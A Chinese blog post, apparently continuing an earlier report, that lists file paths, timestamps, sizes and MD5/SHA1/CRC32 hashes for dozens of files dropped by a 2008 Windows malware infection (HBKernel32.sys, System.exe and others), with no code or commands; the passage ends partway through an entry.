遭遇HBKernel32.sys,aliimz.sys,System.exe,koauolte.exe,cho22.tmp等2

时间:2022-06-01 19:45:27

遭遇HBKernel32.sys,aliimz.sys,System.exe,koauolte.exe,cho22.tmp等2

 

(续1)

 

因为时间的关系,不能对病毒样本文件做测试,这里把部分文件信息发上来。

 

文件说明符 : C:/WINDOWS/system32/HBmhly.dll
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-21 11:28:43
修改时间 : 2008-10-21 11:28:44
大小 : 19968 字节 19.512 KB
MD5 : 70d1b2f6f3224068f6aa1712e06bded1
SHA1: 37F470BEAFB15358E93B69DCF3E79E3E52225B5E
CRC32: 04159184

 

文件说明符 : C:/WINDOWS/system32/HBTL.dll
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-27 13:0:20
修改时间 : 2008-10-28 17:38:6
大小 : 16896 字节 16.512 KB
MD5 : 6fbcc4677b89570e1d0668823a394191
SHA1: 9FF17AC106C3A714E46AE7B79BD9B03F4157D920
CRC32: cae0840f

 

文件说明符 : C:/WINDOWS/system32/HBQQXX.dll
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-26 11:10:3
修改时间 : 2008-10-26 17:27:34
大小 : 14336 字节 14.0 KB
MD5 : b885676ee5449e574e1611683fe025aa
SHA1: 41025D2F9FE90EEA1035788695C586B69739298F
CRC32: 1c79766f

 

文件说明符 : C:/WINDOWS/system32/HBWD.dll
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-21 11:29:40
修改时间 : 2008-10-28 17:38:12
大小 : 16384 字节 16.0 KB
MD5 : 514e2ae1783277d36642d56cbec4066a
SHA1: 7D76F2A442ED60E050CF8E0E8464DEC68B7DC467
CRC32: 45e0d755

 

文件说明符 : C:/Program Files/Internet Explorer/53u1ttMe.2ys
属性 : ASH-
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-26 11:23:48
修改时间 : 2008-10-27 13:8:38
大小 : 46205 字节 45.125 KB
MD5 : 03c20b5f7f92e9557bee2406dd726a12
SHA1: B7281C804E0AE8A0B766BFE4933CC6F3560DCAE5
CRC32: 7e1463d7

 

文件说明符 : C:/WINDOWS/system32/E0D39066.dll
属性 : ASH-
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-26 11:23:37
修改时间 : 2008-10-26 11:23:40
大小 : 11749 字节 11.485 KB
MD5 : 120b625d3ffe33e8b130ef3ce7859c98
SHA1: 874C8F4A87C7EDA1CE04016994B695003CB0713C
CRC32: 98481277

 

文件说明符 : C:/WINDOWS/system32/CABA599D.dll
属性 : ASH-
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-26 11:16:34
修改时间 : 2008-10-27 12:59:40
大小 : 11735 字节 11.471 KB
MD5 : d7260af924a652fa93abb854c5056e04
SHA1: 4237074E73DAAF5F9E3BF526809D681059367788
CRC32: 55b65b27

 

文件说明符 : C:/WINDOWS/system32/9F684DE8.dll
属性 : ASH-
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-25 15:5:44
修改时间 : 2008-10-25 15:5:46
大小 : 11327 字节 11.63 KB
MD5 : 87576681eb5b0a9a761461d3127331b2
SHA1: 27D70C0507CB9A5DB1C393D663D837599885BBF9
CRC32: 7fbe4e33

 

文件说明符 : C:/WINDOWS/system32/12B02216.dll
属性 : ASH-
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-25 15:5:22
修改时间 : 2008-10-25 15:5:24
大小 : 11720 字节 11.456 KB
MD5 : e69c275cd74d09682d82039e96efefc5
SHA1: 20CB99F1183B6FB8CD12635C4D46D1C995AD6F79
CRC32: 6f00b1ff

 

文件说明符 : C:/WINDOWS/system32/9CA963CA.dll
属性 : ASH-
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-21 12:36:30
修改时间 : 2008-10-21 12:36:32
大小 : 11911 字节 11.647 KB
MD5 : a64403424cfadc650a96a7443c13f5ef
SHA1: 23F058D338C9A851F4119F55E67E754F7835DEA1
CRC32: 97c7baa0

 

文件说明符 : C:/WINDOWS/system32/08223B03.dll
属性 : ASH-
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-21 12:36:11
修改时间 : 2008-10-21 12:36:12
大小 : 12213 字节 11.949 KB
MD5 : b5521bde693155e16137569eb4722be3
SHA1: C8D76ACEC48AFA590564C9ABDEBCD5FD84434CFC
CRC32: e081dfd5

 

文件说明符 : C:/WINDOWS/system32/495271CA.dll
属性 : ASH-
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-21 12:35:52
修改时间 : 2008-10-21 12:35:54
大小 : 11971 字节 11.707 KB
MD5 : a7cb6536b127dc3bb58ad19a5ab127c9
SHA1: 79F98E1A6EFB0441A52F2CA4D139955F4917E63B
CRC32: 9fe0acab

 

文件说明符 : C:/WINDOWS/system32/8566F82E.dll
属性 : ASH-
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-21 12:35:33
修改时间 : 2008-10-21 12:35:34
大小 : 12414 字节 12.126 KB
MD5 : 0caf4dd38de3a9f1947ee658ec02189d
SHA1: A195C41C2319F35F8BFCBAA4A2D749DC9C3BC062
CRC32: 299485f7

 

文件说明符 : C:/WINDOWS/system32/58FF3024.dll
属性 : ASH-
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-21 12:35:14
修改时间 : 2008-10-21 12:35:16
大小 : 12976 字节 12.688 KB
MD5 : e516af53211e3339cd0fb6daf0b0ba74
SHA1: C6C70C3651093C50A1D4545D87F5E1E73B9164CC
CRC32: c14212fc

 

文件说明符 : C:/WINDOWS/system32/B3721C07.dll
属性 : ASH-
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-21 12:34:55
修改时间 : 2008-10-21 12:34:56
大小 : 12386 字节 12.98 KB
MD5 : a17be297ad7567499ff2c5568a849fcf
SHA1: 990D8EC92C41F071BF422ACF23D494299E0CF86B
CRC32: 284fd3a7

 

文件说明符 : C:/WINDOWS/system32/DA63E650.dll
属性 : ASH-
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-21 12:34:36
修改时间 : 2008-10-21 12:34:38
大小 : 12789 字节 12.501 KB
MD5 : dab493b0f1113d82966dad63551fbe23
SHA1: 023013191F82FBBC96194A21BADAAE2373D8BBCB
CRC32: 22205121

 

文件说明符 : C:/WINDOWS/system32/4BF9CBA3.dll
属性 : ASH-
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-21 12:33:58
修改时间 : 2008-10-21 12:34:0
大小 : 216899 字节 211.835 KB
MD5 : 233055a081ca5cbd5c48f37715a378dc
SHA1: 6972FB388C0137D3811CA001A02932A693846415
CRC32: 7665b13e

 

文件说明符 : C:/WINDOWS/system32/22D75360.dll
属性 : ASH-
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-21 12:33:39
修改时间 : 2008-10-21 12:33:40
大小 : 216484 字节 211.420 KB
MD5 : 99a834d7010ad97d5b7e7b1a091ad8d0
SHA1: 0FE067C208EDEC333C2C8979904B49086423D763
CRC32: 954f7ade

 

文件说明符 : C:/WINDOWS/system32/7ADC2AB1.dll
属性 : ASH-
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-21 12:33:20
修改时间 : 2008-10-21 12:33:22
大小 : 11227 字节 10.987 KB
MD5 : 4557cacd1c7ad5fa6765e0efa7425007
SHA1: 9006D42247DB1979417413FFDC0981DD70A2C364
CRC32: 3e834f85

 

文件说明符 : C:/WINDOWS/system32/3474A8C2.dll
属性 : ASH-
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-21 12:33:1
修改时间 : 2008-10-21 12:33:2
大小 : 216093 字节 211.29 KB
MD5 : a8972a502f4044a737c4689642bbfd72
SHA1: 3CEE48005F23254D10BA69501BFCD0F8682173D3
CRC32: 6bf7d064

 

文件说明符 : C:/WINDOWS/system32/E4814792.dll
属性 : ASH-
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-21 12:32:23
修改时间 : 2008-10-21 12:32:24
大小 : 11148 字节 10.908 KB
MD5 : c12c2e1f8eb134b6f3bbcbacb3ed6799
SHA1: F6F9EE2B699D27D06986D05D661AE30DF5309765
CRC32: 402611a2

 

文件说明符 : C:/WINDOWS/system32/C250CF20.dll
属性 : ASH-
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-21 12:32:4
修改时间 : 2008-10-21 12:32:6
大小 : 11659 字节 11.395 KB
MD5 : 72d2d6b9189fd65190df1f2658039005
SHA1: A6979892AA6033DEB152E2FFB20FF90C019481CA
CRC32: 567b5bb9

 

文件说明符 : C:/WINDOWS/system32/A8FC611B.dll
属性 : ASH-
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-21 12:31:26
修改时间 : 2008-10-21 12:31:28
大小 : 11376 字节 11.112 KB
MD5 : a3028d4ef069a489e55986864468a1d1
SHA1: 10E7EC783BA7144C7FF828E870EDCA21E38782DD
CRC32: 5c8da4d1

 

文件说明符 : C:/WINDOWS/system32/122B901E.dll
属性 : ASH-
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-21 12:31:7
修改时间 : 2008-10-21 12:31:8
大小 : 12041 字节 11.777 KB
MD5 : 304c0c8d2eb35db074032b81191d9be4
SHA1: 695946707986AD22645DFF33AC70FDFC5B6A4346
CRC32: 0494c199

 

文件说明符 : C:/WINDOWS/system32/D7C79813.dll
属性 : ASH-
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-21 12:30:48
修改时间 : 2008-10-21 12:30:50
大小 : 11685 字节 11.421 KB
MD5 : a547182e1bffac822a35116fba0360fe
SHA1: AEFA21142E16568F80B88575E4531F6D8311CD69
CRC32: 806ed2ad

 

文件说明符 : C:/WINDOWS/system32/DE02F764.dll
属性 : ASH-
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-21 12:30:29
修改时间 : 2008-10-21 12:30:30
大小 : 217211 字节 212.123 KB
MD5 : 5d2f03f211d5b0bcb67f3e9be82d2106
SHA1: E3E9273AAC242DD3712F97D1ACFA362594FCD145
CRC32: 5cc82e8d

 

文件说明符 : C:/WINDOWS/system32/43ACDCC5.dll
属性 : ASH-
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-21 11:30:37
修改时间 : 2008-10-21 11:30:38
大小 : 13419 字节 13.107 KB
MD5 : ba2f50deeb1df9c7fbd2b8a6da5398a2
SHA1: AF4F6A00828587C2A68D2E6F0B2F984A88F54351
CRC32: bef6e2f2

 

文件说明符 : C:/WINDOWS/system32/E3367679.dll
属性 : ASH-
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-21 11:30:18
修改时间 : 2008-10-21 11:30:20
大小 : 216788 字节 211.724 KB
MD5 : 7159ce09ce80a11c4a000a4adcb5e02a
SHA1: 891B88CE6242B2736A4A52C6996E4B29BBA7A4DF
CRC32: fedcbac9

 

文件说明符 : C:/WINDOWS/system32/3D144530.dll
属性 : ASH-
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-21 11:29:59
修改时间 : 2008-10-21 11:30:0
大小 : 11459 字节 11.195 KB
MD5 : 9573440fa729122d19847710d829b8a6
SHA1: 5242C692D61BA58516761CB8C60BBB0BF388D14A
CRC32: da1b12d9

 

文件说明符 : C:/WINDOWS/system32/HBWOW.dll
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-21 11:29:21
修改时间 : 2008-10-28 17:38:20
大小 : 28672 字节 28.0 KB
MD5 : f89fc58ea4797f8c688e7442545d6d42
SHA1: C6ACFFBA60254CC0330A35C733A69F21CBBA07EA
CRC32: b354e5d0

 

文件说明符 : C:/WINDOWS/system32/HBJXSJ.dll
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-26 11:9:46
修改时间 : 2008-10-28 17:38:0
大小 : 24576 字节 24.0 KB
MD5 : b6777add242ed0666581d0fc98e180df
SHA1: 369DF45038BEA83FB7E3968F0A06BA280B3864EB
CRC32: 23e68c56

 

文件说明符 : C:/Program Files/Common Files/Microsoft Shared/MSInfo/Come_System.sys
属性 : ASH-
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-27 8:32:31
修改时间 : 2008-10-27 8:33:56
大小 : 29805 字节 29.109 KB
MD5 : 341a3dbab76534adba84dfe03e96e2d8
SHA1: 0A8F8362695F98ADA147C33E406808F7980C1BFE
CRC32: 1da626fd

 

文件说明符 : C:/WINDOWS/System32/system.exe
属性 : A---
数字签名:否
PE文件:是
语言 : 英语(美国)
文件版本 : 1, 2, 1, 1007
说明 : HB Inject Application Version 1.2.1.1007
版权 : Copyright ? 2008, HB Software
产品版本 : 1, 2, 1, 1007
产品名称 : HB Inject Application
公司名称 : HB Software
内部名称 : HBInject
源文件名 : HBInject.exe
创建时间 : 2008-10-21 11:28:43
修改时间 : 2008-10-21 11:28:44
大小 : 3572 字节 3.500 KB
MD5 : dd62c474ee9c417466cd55adcaf63fd2
SHA1: 8478E49534628AC17E6B27C4F0E3625B2FE08076
CRC32: c2450b3f

 

文件说明符 : C:/WINDOWS/System32/koauolte.exe
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-21 11:28:9
修改时间 : 2008-10-21 11:27:50
大小 : 23761 字节 23.209 KB
MD5 : 017904c53a5a2414c30c935b5ab1af59
SHA1: 3647926F2BFAC31E9B2CE5F807EFEC0B814AA2CB
CRC32: cc0d49af

 

文件说明符 : C:/Documents and Settings/Administrator/Local Settings/Temp/cho22.tmp
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-26 11:23:58
修改时间 : 2008-10-28 17:41:26
大小 : 49887 字节 48.735 KB
MD5 : 930df86d2b28a084c9df25ef3ed4832e
SHA1: 5D199540AC79A537D68A623874EB73F76F742BE0
CRC32: a2b8ea84

 

文件说明符 : C:/Documents and Settings/Administrator/Local Settings/Temp/svDE.tmp
属性 : ----
数字签名:否
PE文件:是
语言 : 中文(中国)
文件版本 : 1, 0, 0, 1
版权 : Copyright ? 2008
产品版本 : 1, 0, 0, 1
创建时间 : 2008-10-27 13:27:57
修改时间 : 2008-10-27 14:29:38
大小 : 33637 字节 32.869 KB
MD5 : 254b71b8e4ea058d2dde999d5656eff1
SHA1: 9A6F54A8F474640BA9085F64ECEF58EE0C9EC79E
CRC32: 62f40ea6

 

文件说明符 : C:/WINDOWS/system32/alivin.exe
属性 : -SH-
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2005-12-15 0:0:0
修改时间 : 2005-12-15 0:0:0
大小 : 23233 字节 22.705 KB
MD5 : f73d050dc1be3b7d48fbdd7a8bac7a35
SHA1: 10E4307B655D12344736A2EF47CB1C6BA0A011D3
CRC32: f3d37b41

 

文件说明符 : C:/0001B531/685562
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-21 12:37:46
修改时间 : 2008-10-21 12:37:48
大小 : 48560 字节 47.432 KB
MD5 : 622ed32892ae672e8d617a51f6da0e54
SHA1: 857907B8A5B3D5C400BC0EB883A1F766739DD4EE
CRC32: 2bb16dec


文件说明符 : C:/WINDOWS/system32/4901228.sys
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-21 11:30:37
修改时间 : 2008-10-21 11:30:38
大小 : 5504 字节 5.384 KB
MD5 : 2c447dcf5b4f44ca4a44ecea73bbebf1
SHA1: 285376C51E98176BCCEC889B71FAE522564D7C6F
CRC32: 79292500

 

文件说明符 : C:/WINDOWS/system32/5102a80.sys
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-25 15:4:56
修改时间 : 2008-10-25 15:4:58
大小 : 5504 字节 5.384 KB
MD5 : ffc4f818abd2242cb429f6fd785d2eca
SHA1: 94E50A92A6D7837AE6535A772F6754E41D511112
CRC32: 5b355bcb

 

文件说明符 : C:/WINDOWS/system32/8882fa1.sys
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-21 12:33:57
修改时间 : 2008-10-21 12:33:58
大小 : 5504 字节 5.384 KB
MD5 : a28467c5f5b8e7f6b4b288471d2a60cf
SHA1: 4A9A42FA0E6E59CA49CAA8CDCDFB902D3A17FE9D
CRC32: c0b7b2e3

 

文件说明符 : C:/WINDOWS/system32/8b52f47.sys
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-21 11:29:59
修改时间 : 2008-10-21 11:30:0
大小 : 5504 字节 5.384 KB
MD5 : c2d13357df0fc1402aaae00a55944334
SHA1: CA0B2019F8EA5915561ACA7B78B0BED5CE418110
CRC32: d4c57227

 

文件说明符 : C:/WINDOWS/system32/9fd8db.sys
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-25 15:4:40
修改时间 : 2008-10-25 15:4:42
大小 : 5504 字节 5.384 KB
MD5 : 9f1d1601e6ea948af283aa9bfb911d2b
SHA1: B9D03000D167B93758D73046EDF0AED734DC00D6
CRC32: 80036256

 

文件说明符 : C:/WINDOWS/system32/aecff9.sys
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-21 12:31:7
修改时间 : 2008-10-21 12:31:8
大小 : 5504 字节 5.384 KB
MD5 : 76e9ae190e26f8dad0c5773ee10ce713
SHA1: 98CC77F5C4457F8A146A65E423FAEBD590857CBF
CRC32: 3789a423

 

文件说明符 : C:/WINDOWS/system32/c551839.sys
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-21 12:33:20
修改时间 : 2008-10-21 12:33:22
大小 : 5504 字节 5.384 KB
MD5 : b44832a0bfe79fc6ef60a691c3216e25
SHA1: 5F3B58704A70331B5B49D721552392FB1C8F6902
CRC32: c60de33e

 

文件说明符 : C:/WINDOWS/system32/9fd8db.sys
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-28 18:18:35
修改时间 : 2008-10-28 18:18:36
大小 : 5504 字节 5.384 KB
MD5 : 9f1d1601e6ea948af283aa9bfb911d2b
SHA1: B9D03000D167B93758D73046EDF0AED734DC00D6
CRC32: 80036256

 

文件说明符 : C:/WINDOWS/system32/drivers/lklosd.sys
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-21 11:27:54
修改时间 : 2008-10-21 11:27:56
大小 : 1426 字节 1.402 KB
MD5 : 5d9c18c2e95074bbace6fc41dcec5f1e
SHA1: C3A8F0F17F83B6675707114E137CBB1E271D09F2
CRC32: 258a8517

 

文件说明符 : C:/WINDOWS/system32/drivers/aliimz
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-25 15:0:27
修改时间 : 2008-10-28 17:41:10
大小 : 2784 字节 2.736 KB
MD5 : 987447cae51bcbdf720cd9b4d7c30a23
SHA1: D2E413017435867CF505DE1885092AD80BF4315A
CRC32: 673dada8

 

文件说明符 : C:/WINDOWS/system32/drivers/HBKernel32.sys
属性 : A---
数字签名:否
PE文件:否
创建时间 : 2008-10-21 11:28:43
修改时间 : 2008-10-28 18:18:30
大小 : 16343 字节 15.983 KB
MD5 : 900c3650ca2d45d322a603cfa53e9d10
SHA1: 4708DA9C5162883E42883E7591B6C0EA28747A3E
CRC32: 56ed0772


文件说明符 : C:/WINDOWS/system32/4BF9CBA3.dll
属性 : ASH-
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-28 18:19:58
修改时间 : 2008-10-28 18:20:0
大小 : 217045 字节 211.981 KB
MD5 : 963772b80b073e5513fdb700bc71cfc4
SHA1: B5A02B9ECF484378006635A3972F8ED9166F83BA
CRC32: 12a8d649

 

文件说明符 : C:/WINDOWS/system32/3474A8C2.dll
属性 : ASH-
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-28 18:20:3
修改时间 : 2008-10-28 18:20:4
大小 : 216189 字节 211.125 KB
MD5 : fb2cb4c037663b5356efc14b35c3e234
SHA1: 6FDEF71DF4308B30B7FFC187B9874797A0D822AB
CRC32: 5e28b71d

 

文件说明符 : C:/WINDOWS/system32/DA63E650.dll
属性 : ASH-
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-28 18:20:9
修改时间 : 2008-10-28 18:20:10
大小 : 12872 字节 12.584 KB
MD5 : 98bf5aafaa996e21c3df3def1a5b6f5f
SHA1: 73259F7C47FF12A9BF91E9D1C1FF599BCADF32D2
CRC32: 0475d434

 

文件说明符 : C:/WINDOWS/system32/B3721C07.dll
属性 : ASH-
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-28 18:20:14
修改时间 : 2008-10-28 18:20:16
大小 : 12552 字节 12.264 KB
MD5 : ea194c3f524731e294ff40d67170f2ec
SHA1: B758E5CBE5B8CC3298AF411089815F62E653C962
CRC32: a42da043

 

文件说明符 : C:/WINDOWS/system32/5102a80.sys
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-28 18:20:19
修改时间 : 2008-10-28 18:20:20
大小 : 5504 字节 5.384 KB
MD5 : ffc4f818abd2242cb429f6fd785d2eca
SHA1: 94E50A92A6D7837AE6535A772F6754E41D511112
CRC32: 5b355bcb

文件说明符 : C:/WINDOWS/system32/58FF3024.dll
属性 : ASH-
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-28 18:20:19
修改时间 : 2008-10-28 18:20:20
大小 : 13023 字节 12.735 KB
MD5 : 46563f0dc16f400843593fa1d1693f6d
SHA1: D31C8F548A63E62E4F4AD88A244962578EEB0571
CRC32: 889b1310

 

文件说明符 : C:/WINDOWS/system32/8566F82E.dll
属性 : ASH-
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-28 18:20:26
修改时间 : 2008-10-28 18:20:26
大小 : 12569 字节 12.281 KB
MD5 : 3ed18b00afa5bec732694a1d7f0db28e
SHA1: C541F9E5D7C7C47F6DFF855E47EC425C02CAEA52
CRC32: 6a760fb1

 

文件说明符 : C:/WINDOWS/system32/495271CA.dll
属性 : ASH-
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-28 18:20:30
修改时间 : 2008-10-28 18:20:32
大小 : 12010 字节 11.746 KB
MD5 : f77b0b430f9bc6fd6701be8dd80fb86f
SHA1: 2F3C012118D0751EBF93305C7F0273B6E4B7B171
CRC32: 3092dc15

 

文件说明符 : C:/WINDOWS/system32/08223B03.dll
属性 : ASH-
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-28 18:20:36
修改时间 : 2008-10-28 18:20:38
大小 : 12375 字节 12.87 KB
MD5 : c31bce97a45769b84991c9f42d808f34
SHA1: 446F3272333D2740139807908B2DDEDCA40FCE32
CRC32: eedb2679

 

文件说明符 : C:/WINDOWS/system32/9CA963CA.dll
属性 : ASH-
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-28 18:20:41
修改时间 : 2008-10-28 18:20:42
大小 : 12002 字节 11.738 KB
MD5 : 4e9cd22f85a0eccdb36a2174e2ec9abc
SHA1: D58E18A5F0813FC5DE7AD58E97479E6045623217
CRC32: 0931155c

 

文件说明符 : C:/WINDOWS/system32/E0D39066.dll
属性 : ASH-
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-28 18:20:46
修改时间 : 2008-10-28 18:20:48
大小 : 11749 字节 11.485 KB
MD5 : 120b625d3ffe33e8b130ef3ce7859c98
SHA1: 874C8F4A87C7EDA1CE04016994B695003CB0713C
CRC32: 98481277

 

文件说明符 : C:/WINDOWS/system32/alatin.dll
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-28 17:41:9
修改时间 : 2008-10-28 18:20:52
大小 : 20480 字节 20.0 KB
MD5 : 6669116c9a5c8e0a72c8f8bf092f6b67
SHA1: 56DF9F04F86CE90CAFCE1BB4D524C8AE6D20DCDA
CRC32: 571270d9


文件说明符 : C:/WINDOWS/system32/HBmhly.dll
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-28 18:18:7
修改时间 : 2008-10-28 18:18:8
大小 : 19968 字节 19.512 KB
MD5 : 70d1b2f6f3224068f6aa1712e06bded1
SHA1: 37F470BEAFB15358E93B69DCF3E79E3E52225B5E
CRC32: 04159184

 

文件说明符 : C:/WINDOWS/system32/System.exe
属性 : A---
数字签名:否
PE文件:是
语言 : 英语(美国)
文件版本 : 1, 2, 1, 1007
说明 : HB Inject Application Version 1.2.1.1007
版权 : Copyright ? 2008, HB Software
产品版本 : 1, 2, 1, 1007
产品名称 : HB Inject Application
公司名称 : HB Software
内部名称 : HBInject
源文件名 : HBInject.exe
创建时间 : 2008-10-28 18:18:7
修改时间 : 2008-10-28 18:18:8
大小 : 3572 字节 3.500 KB
MD5 : dd62c474ee9c417466cd55adcaf63fd2
SHA1: 8478E49534628AC17E6B27C4F0E3625B2FE08076
CRC32: c2450b3f

 

文件说明符 : C:/WINDOWS/system32/HBJXSJ.dll
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-28 18:18:12
修改时间 : 2008-10-28 18:18:14
大小 : 24576 字节 24.0 KB
MD5 : b6777add242ed0666581d0fc98e180df
SHA1: 369DF45038BEA83FB7E3968F0A06BA280B3864EB
CRC32: 23e68c56

 

文件说明符 : C:/WINDOWS/system32/HBTL.dll
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-28 18:18:18
修改时间 : 2008-10-28 18:18:20
大小 : 16896 字节 16.512 KB
MD5 : 6fbcc4677b89570e1d0668823a394191
SHA1: 9FF17AC106C3A714E46AE7B79BD9B03F4157D920
CRC32: cae0840f

 

文件说明符 : C:/WINDOWS/system32/HBWD.dll
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-28 18:18:24
修改时间 : 2008-10-28 18:18:26
大小 : 16384 字节 16.0 KB
MD5 : 514e2ae1783277d36642d56cbec4066a
SHA1: 7D76F2A442ED60E050CF8E0E8464DEC68B7DC467
CRC32: 45e0d755

 

文件说明符 : C:/WINDOWS/system32/HBWOW.dll
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-28 18:18:29
修改时间 : 2008-10-28 18:18:30
大小 : 28672 字节 28.0 KB
MD5 : f89fc58ea4797f8c688e7442545d6d42
SHA1: C6ACFFBA60254CC0330A35C733A69F21CBBA07EA
CRC32: b354e5d0

 

文件说明符 : C:/WINDOWS/system32/9fd8db.sys
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-28 18:18:35
修改时间 : 2008-10-28 18:18:36
大小 : 5504 字节 5.384 KB
MD5 : 9f1d1601e6ea948af283aa9bfb911d2b
SHA1: B9D03000D167B93758D73046EDF0AED734DC00D6
CRC32: 80036256

 

文件说明符 : C:/WINDOWS/system32/CABA599D.dll
属性 : ASH-
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-28 18:18:36
修改时间 : 2008-10-28 18:18:38
大小 : 11735 字节 11.471 KB
MD5 : d7260af924a652fa93abb854c5056e04
SHA1: 4237074E73DAAF5F9E3BF526809D681059367788
CRC32: 55b65b27

 

文件说明符 : C:/WINDOWS/system32/3D144530.dll
属性 : ASH-
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-28 18:18:41
修改时间 : 2008-10-28 18:18:42
大小 : 11533 字节 11.269 KB
MD5 : 0fa85da9aa61ccb7f75581e5bf1dfdf6
SHA1: CC7FCA864680DFC231C7CACF619CAD4B6D077DBC
CRC32: 4f5948f1

 

文件说明符 : C:/WINDOWS/system32/DE02F764.dll
属性 : ASH-
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-28 18:18:46
修改时间 : 2008-10-28 18:18:48
大小 : 217224 字节 212.136 KB
MD5 : 9d3cc5bb67d56795e61b1fc262ffdcc1
SHA1: 1E20138E8E1399071B38F34CAD9348D802829876
CRC32: fcfac88c

 

文件说明符 : C:/WINDOWS/system32/43ACDCC5.dll
属性 : ASH-
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-28 18:18:51
修改时间 : 2008-10-28 18:18:52
大小 : 13511 字节 13.199 KB
MD5 : 98d75ec5ca36bead8286f8b2846600f0
SHA1: F847833B056F5B22BDC8CA526CAE353C797B5280
CRC32: 8f9ec655

 

文件说明符 : C:/WINDOWS/system32/E3367679.dll
属性 : ASH-
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-10-28 18:18:57
修改时间 : 2008-10-28 18:18:58
大小 : 216870 字节 211.806 KB
MD5 : 4364154e5fd5c1f821e0db6435ec8771
SHA1: 1C8A7CF6EB7573006E1079E30E2E6C71223EFAAB
CRC32: 00aa90ef

 

文件说明符 : C:/WINDOWS/system32/D7C79813.dll
属性 : ASH-
数字签名:否
PE文件:是
